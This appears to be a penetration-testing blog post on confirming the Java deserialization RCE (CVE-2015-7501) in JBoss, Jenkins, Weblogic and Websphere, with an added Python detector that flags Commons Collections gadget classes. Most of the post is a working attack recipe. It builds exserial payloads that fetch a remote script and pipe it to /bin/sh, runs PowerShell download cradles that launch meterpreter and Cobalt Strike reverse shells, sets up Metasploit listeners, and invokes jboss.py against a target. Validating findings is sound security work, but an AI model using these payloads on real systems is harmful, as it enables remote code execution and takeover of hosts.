Maybe you are on a pentest or a vulnerability management team for your organization and you ran across a deserialization finding. This vulnerability affects a number of products including, but not limited to, JBoss, Jenkins, Weblogic, and Websphere. The example finding below is from the Nessus vulnerability scanner:
JBoss Java Object Deserialization RCE
Description: The remote host is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this, by sending a crafted RMI request, to execute arbitrary code on the target host. (CVE-2015-7501)
Family: Web Servers
Nessus Plugin ID: 87312
Now that you have the finding you need to validate it. We will outline just one possible method for validating JBoss, Jenkins, Weblogic, and Websphere below.
Background info
In a nutshell: "The Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library."
For more information, a very good and detailed explanation can be found here: https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
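On the defensive side of the same finding, the useful property of this bug class is that the malicious input has a fixed shape: a Java serialization stream (magic bytes AC ED 00 05, or "rO0AB" when base64-encoded) whose class descriptors name the commons-collections "functors" classes the gadget chain is built from. The script below is an added example, not code from the original post or from the exserial project: it walks request bodies, pulls the class names out of every TC_CLASSDESC record, and flags known Apache Commons Collections gadget classes. The sample bodies are constructed for the example (they carry only stream framing, not a working chain), and the gadget class list is an assumed starting point rather than an exhaustive signature set.

```python
import base64
import re
import struct

# Java serialization stream framing (java.io.ObjectStreamConstants).
STREAM_MAGIC = b"\xac\xed"
STREAM_VERSION = b"\x00\x05"
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72

# Apache Commons Collections classes used by the CVE-2015-7501 gadget chains.
# Assumption: a starting blocklist for alerting, not a complete one.
GADGET_CLASS_PREFIXES = (
    "org.apache.commons.collections.functors.InvokerTransformer",
    "org.apache.commons.collections.functors.ChainedTransformer",
    "org.apache.commons.collections.functors.ConstantTransformer",
    "org.apache.commons.collections4.functors.InvokerTransformer",
    "org.apache.commons.collections4.functors.ChainedTransformer",
)

# Fully qualified Java class name, optionally in array-descriptor form ("[Lfoo.Bar;").
_CLASS_NAME = re.compile(r"^\[*L?[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*;?$")


def normalize_body(body: bytes) -> bytes:
    """Return raw stream bytes; a base64 body starting with rO0AB is decoded first."""
    if body.startswith(b"rO0AB"):
        try:
            return base64.b64decode(body)
        except ValueError:  # binascii.Error is a ValueError subclass
            return body
    return body


def is_java_serialized(data: bytes) -> bool:
    """True when the data starts with the Java serialization magic and version."""
    return data.startswith(STREAM_MAGIC + STREAM_VERSION)


def extract_class_names(stream: bytes) -> list:
    """Heuristic scan (not a full ObjectInputStream parser): each TC_CLASSDESC byte is
    followed by a 2-byte big-endian length and the class name in modified UTF-8."""
    names = []
    i = 0
    while True:
        i = stream.find(bytes([TC_CLASSDESC]), i)
        if i == -1 or i + 3 > len(stream):
            break
        (length,) = struct.unpack_from(">H", stream, i + 1)
        raw = stream[i + 3 : i + 3 + length]
        try:
            name = raw.decode("ascii")
        except UnicodeDecodeError:
            i += 1
            continue
        # Require a dotted name to cut false positives from stray 0x72 ('r') bytes.
        if len(raw) == length and "." in name and _CLASS_NAME.match(name):
            if name not in names:
                names.append(name)
            i += 3 + length
        else:
            i += 1
    return names


def inspect_request(body: bytes) -> dict:
    """Classify one HTTP request body: is it a Java stream, which classes does it
    reference, and which of those are on the gadget blocklist."""
    stream = normalize_body(body)
    result = {"serialized": is_java_serialized(stream), "classes": [], "gadget_hits": []}
    if not result["serialized"]:
        return result
    result["classes"] = extract_class_names(stream)
    result["gadget_hits"] = [c for c in result["classes"] if c.startswith(GADGET_CLASS_PREFIXES)]
    return result


def _classdesc(name: str) -> bytes:
    """Constructed TC_CLASSDESC record: name, serialVersionUID, flags, field count."""
    n = name.encode("ascii")
    return bytes([TC_CLASSDESC]) + struct.pack(">H", len(n)) + n + b"\x00" * 8 + b"\x02" + b"\x00\x00"


# Constructed sample bodies: stream framing only, no working gadget chain.
PLAIN_BODY = b"username=alice&action=view"
BENIGN_BODY = STREAM_MAGIC + STREAM_VERSION + bytes([TC_OBJECT]) + _classdesc("java.util.HashMap")
SUSPECT_BODY = (
    BENIGN_BODY
    + bytes([TC_OBJECT])
    + _classdesc("org.apache.commons.collections.functors.InvokerTransformer")
)
SUSPECT_BODY_B64 = base64.b64encode(SUSPECT_BODY)

if __name__ == "__main__":
    for label, body in (("plain", PLAIN_BODY), ("benign", BENIGN_BODY),
                        ("suspect", SUSPECT_BODY), ("suspect-b64", SUSPECT_BODY_B64)):
        print(label, inspect_request(body))
```

Run it on bodies pulled from a proxy log or a WAF capture; a hit in `gadget_hits` is worth an alert on its own, while `serialized` being true on an endpoint that should never accept Java objects (the unauthenticated JMXInvokerServlet path the Nessus plugin describes, for instance) is the more general signal.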
Step 1) Download Tools
Now on to the exploit/validation! Clone or download the zipped tools here: https://github.com/getcode2git/exserial
Step 2) Building the payload
Quick and easy one-liners per the exserial instructions:
The exserial readme provides two great examples shown below, but we will add a Cobalt Strike option for those who prefer a beacon shell. If you are spawning reverse shells, remember to start your listener first. ;-)
1) Run a shell script on a Linux victim:
$ java -jar exserial.jar CommandExec Linux "curl http://myserver.com/todo.sh|/bin/sh" > payload.ser
2) Get a reverse HTTPS meterpreter shell via powershell download of Invoke-Shellcode
Setup the listener:
msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_https
msf> set lhost <local IP>
msf> set lport <local port>
msf> set ExitOnSession false
msf> exploit -j
Create the serialized payload:
$ java -jar exserial.jar CommandExec Win "powershell IEX (New-Object Net.WebClient).DownloadString('http://myserver.com/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <ListenerIP> -Lport 4444 -Force" > payload.ser
3) Cobalt Strike beacon
Create the listener (ex: reverse_https to 443)
Cobalt Strike -> Listeners -> Add
Name: rev_https
Payload: windows/beacon_https/reverse_https
IP: <Your teamserver IP>
Port: 443
Attacks -> Web Drive-by -> Scripted Web delivery
Default will work for this
Create the serialized payload:
java -jar exserial.jar CommandExec Win "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx.xxx/a'))" > payload.ser
Step 3) Running the Exploit
Now that the payload is created, it is time to run the exploit. In the scripts folder, you will find four python scripts. The example below shows the syntax and an example for using the JBoss exploit.
Syntax:
python jboss.py http://<target>:<port> /path/to/payload
Example:
python jboss.py http://JbossServer:8080 /root/deserial/payload.ser
Conclusion
This is a fast and flexible method to validate this vulnerability. Other possibilities for validating this issue include downloading a "flag", running a reverse ping, or a netcat shell.
Huge thanks to https://github.com/RickGray for the publicly available tools.